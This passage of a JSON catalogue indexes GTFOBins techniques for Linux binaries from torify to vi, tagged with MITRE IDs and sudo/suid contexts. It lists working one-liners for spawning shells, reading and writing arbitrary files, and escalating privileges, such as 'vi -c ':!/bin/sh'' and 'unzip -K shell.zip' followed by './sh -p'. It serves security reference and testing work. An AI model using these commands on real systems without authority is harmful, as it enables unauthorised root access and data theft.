installation","aliases":[]},{"id":"gtfo:torify:shell:0:unprivileged","toolId":"gtfo:torify","toolName":"torify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"torify /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/torify/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:torsocks:shell:0:sudo","toolId":"gtfo:torsocks","toolName":"torsocks","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"torsocks /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/torsocks/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:torsocks:shell:0:unprivileged","toolId":"gtfo:torsocks","toolName":"torsocks","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"torsocks /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/torsocks/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:troff:file-read:0:sudo","toolId":"gtfo:troff","toolName":"troff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"troff /path/to/input-file","description":"The file is typeset but text is still readable in the output, alternatively the output can be read with `man -l`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/troff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:troff:file-read:0:suid","toolId":"gtfo:troff","toolName":"troff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"troff /path/to/input-file","description":"The file is typeset but text is still readable in the output, alternatively the output can be read with `man -l`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/troff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:troff:file-read:0:unprivileged","toolId":"gtfo:troff","toolName":"troff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"troff /path/to/input-file","description":"The file is typeset but text is still readable in the output, alternatively the output can be read with `man -l`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/troff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tsc:file-read:0:sudo","toolId":"gtfo:tsc","toolName":"tsc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tsc /path/to/input-file.ts","description":"Content is leaked as error messages. The file extension must be one of the supported ones, e.g., `.ts`, `.tsx`, etc.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tsc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tsc:file-read:0:unprivileged","toolId":"gtfo:tsc","toolName":"tsc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tsc /path/to/input-file.ts","description":"Content is leaked as error messages. The file extension must be one of the supported ones, e.g., `.ts`, `.tsx`, etc.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tsc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tsc:file-write:0:sudo","toolId":"gtfo:tsc","toolName":"tsc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tsc /path/to/input-file.ts --outFile /path/to/output-file","description":"Content is leaked as error messages and written to file. The file extension must be one of the supported ones, e.g., `.ts`, `.tsx`, etc.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tsc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tsc:file-write:0:unprivileged","toolId":"gtfo:tsc","toolName":"tsc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"tsc /path/to/input-file.ts --outFile /path/to/output-file","description":"Content is leaked as error messages and written to file. The file extension must be one of the supported ones, e.g., `.ts`, `.tsx`, etc.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tsc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tshark:inherit:0:sudo","toolId":"gtfo:tshark","toolName":"tshark","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\ntshark -Xlua_script:/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tshark/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tshark:inherit:0:unprivileged","toolId":"gtfo:tshark","toolName":"tshark","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\ntshark -Xlua_script:/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tshark/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ul:file-read:0:sudo","toolId":"gtfo:ul","toolName":"ul","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ul /path/to/input-file","description":"The read file content is corrupted by replacing occurrences of `$'\\b_'` to terminal sequences and by converting tabs to spaces.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ul/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ul:file-read:0:suid","toolId":"gtfo:ul","toolName":"ul","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ul /path/to/input-file","description":"The read file content is corrupted by replacing occurrences of `$'\\b_'` to terminal sequences and by converting tabs to spaces.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ul/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ul:file-read:0:unprivileged","toolId":"gtfo:ul","toolName":"ul","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ul /path/to/input-file","description":"The read file content is corrupted by replacing occurrences of `$'\\b_'` to terminal sequences and by converting tabs to spaces.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ul/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unexpand:file-read:0:sudo","toolId":"gtfo:unexpand","toolName":"unexpand","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"unexpand -t999 /path/to/input-file","description":"Convert sequences of (e.g., `999`) spaces to tab.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/unexpand/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unexpand:file-read:0:suid","toolId":"gtfo:unexpand","toolName":"unexpand","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"unexpand -t999 /path/to/input-file","description":"Convert sequences of (e.g., `999`) spaces to tab.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/unexpand/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unexpand:file-read:0:unprivileged","toolId":"gtfo:unexpand","toolName":"unexpand","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"unexpand -t999 /path/to/input-file","description":"Convert sequences of (e.g., `999`) spaces to tab.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/unexpand/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:uniq:file-read:0:sudo","toolId":"gtfo:uniq","toolName":"uniq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"uniq /path/to/input-file","description":"The read file content is corrupted by squashing multiple adjacent lines.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/uniq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:uniq:file-read:0:suid","toolId":"gtfo:uniq","toolName":"uniq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"uniq /path/to/input-file","description":"The read file content is corrupted by squashing multiple adjacent lines.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/uniq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:uniq:file-read:0:unprivileged","toolId":"gtfo:uniq","toolName":"uniq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"uniq /path/to/input-file","description":"The read file content is corrupted by squashing multiple adjacent lines.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/uniq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unshare:shell:0:sudo","toolId":"gtfo:unshare","toolName":"unshare","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"unshare /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/unshare/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unshare:shell:0:suid","toolId":"gtfo:unshare","toolName":"unshare","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"unshare -r /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/unshare/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unshare:shell:0:unprivileged","toolId":"gtfo:unshare","toolName":"unshare","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"unshare /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/unshare/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unsquashfs:privilege-escalation:0:sudo","toolId":"gtfo:unsquashfs","toolName":"unsquashfs","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"unsquashfs shell\n./squashfs-root/sh -p","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/unsquashfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unsquashfs:privilege-escalation:0:suid","toolId":"gtfo:unsquashfs","toolName":"unsquashfs","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"unsquashfs shell\n./squashfs-root/sh -p","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/unsquashfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unzip:privilege-escalation:0:sudo","toolId":"gtfo:unzip","toolName":"unzip","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"unzip -K shell.zip\n./sh -p","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/unzip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:unzip:privilege-escalation:0:suid","toolId":"gtfo:unzip","toolName":"unzip","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"unzip -K shell.zip\n./sh -p","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/unzip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:update-alternatives:file-write:0:sudo","toolId":"gtfo:update-alternatives","toolName":"update-alternatives","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nupdate-alternatives --force --install /path/to/output-file x /path/to/temp-file 0","description":"Write in `/path/to/output-file` a symlink to `/path/to/temp-file`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/update-alternatives/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:update-alternatives:file-write:0:suid","toolId":"gtfo:update-alternatives","toolName":"update-alternatives","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nupdate-alternatives --force --install /path/to/output-file x /path/to/temp-file 0","description":"Write in `/path/to/output-file` a symlink to `/path/to/temp-file`.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/update-alternatives/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:urlget:file-read:0:sudo","toolId":"gtfo:urlget","toolName":"urlget","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"urlget - /path/to/input-file","description":"This is part of `gettext` and usually not in `PATH`, e.g., on Arch it can be found at `/usr/lib/gettext/urlget`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/urlget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:urlget:file-read:0:suid","toolId":"gtfo:urlget","toolName":"urlget","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"urlget - /path/to/input-file","description":"This is part of `gettext` and usually not in `PATH`, e.g., on Arch it can be found at `/usr/lib/gettext/urlget`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/urlget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:urlget:file-read:0:unprivileged","toolId":"gtfo:urlget","toolName":"urlget","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"urlget - /path/to/input-file","description":"This is part of `gettext` and usually not in `PATH`, e.g., on Arch it can be found at `/usr/lib/gettext/urlget`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/urlget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:uuencode:file-read:0:sudo","toolId":"gtfo:uuencode","toolName":"uuencode","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"uuencode /path/to/input-file /dev/stdout | uudecode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/uuencode/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:uuencode:file-read:0:suid","toolId":"gtfo:uuencode","toolName":"uuencode","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"uuencode /path/to/input-file /dev/stdout | uudecode","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/uuencode/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:uuencode:file-read:0:unprivileged","toolId":"gtfo:uuencode","toolName":"uuencode","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"uuencode /path/to/input-file /dev/stdout | uudecode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/uuencode/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:uv:shell:0:sudo","toolId":"gtfo:uv","toolName":"uv","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"uv run /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/uv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:uv:shell:0:unprivileged","toolId":"gtfo:uv","toolName":"uv","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"uv run /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/uv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vagrant:inherit:0:sudo","toolId":"gtfo:vagrant","toolName":"vagrant","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"echo '...' >Vagrantfile\nvagrant up","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vagrant/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vagrant:inherit:0:unprivileged","toolId":"gtfo:vagrant","toolName":"vagrant","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"echo '...' >Vagrantfile\nvagrant up","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vagrant/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:valgrind:shell:0:sudo","toolId":"gtfo:valgrind","toolName":"valgrind","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"valgrind /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/valgrind/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:valgrind:shell:0:unprivileged","toolId":"gtfo:valgrind","toolName":"valgrind","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"valgrind /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/valgrind/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:varnishncsa:file-write:0:sudo","toolId":"gtfo:varnishncsa","toolName":"varnishncsa","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"varnishncsa -g request -q 'ReqURL ~ \"/xxxxxxxxxx\"' -F '%{yyy}i' -w /path/to/output-file","description":"The command hangs, so the trigger command must be performed asynchronously or in another terminal:\n\n```\ncurl -H 'xxx: DATA' http://localhost:6081/xxxxxxxxxx\n```","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/varnishncsa/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:varnishncsa:file-write:0:suid","toolId":"gtfo:varnishncsa","toolName":"varnishncsa","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"varnishncsa -g request -q 'ReqURL ~ \"/xxxxxxxxxx\"' -F '%{yyy}i' -w /path/to/output-file","description":"The command hangs, so the trigger command must be performed asynchronously or in another terminal:\n\n```\ncurl -H 'xxx: DATA' http://localhost:6081/xxxxxxxxxx\n```","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/varnishncsa/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:file-read:0:sudo","toolId":"gtfo:vi","toolName":"vi","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"vi /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:file-read:0:suid","toolId":"gtfo:vi","toolName":"vi","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"vi /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:file-read:0:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"vi /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:file-write:0:sudo","toolId":"gtfo:vi","toolName":"vi","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"vi /path/to/output-file\niDATA\n^[\nw","description":"Where `^[` is the escape key.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:file-write:0:suid","toolId":"gtfo:vi","toolName":"vi","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"vi /path/to/output-file\niDATA\n^[\nw","description":"Where `^[` is the escape key.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:file-write:0:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"vi /path/to/output-file\niDATA\n^[\nw","description":"Where `^[` is the escape key.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:0:sudo","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':!/bin/sh' /dev/null","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:0:suid","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege 